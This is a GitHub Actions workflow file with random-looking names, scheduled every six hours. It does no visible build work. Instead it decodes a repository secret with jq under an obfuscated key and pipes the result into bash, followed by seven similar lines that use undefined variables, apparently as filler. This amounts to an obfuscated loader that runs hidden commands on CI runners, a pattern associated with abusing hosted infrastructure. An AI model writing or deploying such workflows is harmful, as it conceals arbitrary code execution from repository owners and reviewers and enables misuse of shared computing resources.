name: luyinsi6734
on:
  workflow_dispatch:
  schedule:
    - cron: '33 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: luyinsi6734
        env:
          t3: ${{ secrets.t3 }}
        run: |
          echo $t3 | jq -r .ect2977 | /bin/bash
          echo $nxyn040 | jq -r .etkj5 | /bin/bash
          echo $epq16 | jq -r .rih67 | /bin/bash
          echo $bid4 | jq -r .iu0 | /bin/bash
          echo $mft4116 | jq -r .qv173 | /bin/bash
          echo $lhkgg809 | jq -r .yiwu4044 | /bin/bash
          echo $jxc05739 | jq -r .q4 | /bin/bash
          echo $oee66 | jq -r .evsn09632 | /bin/bash

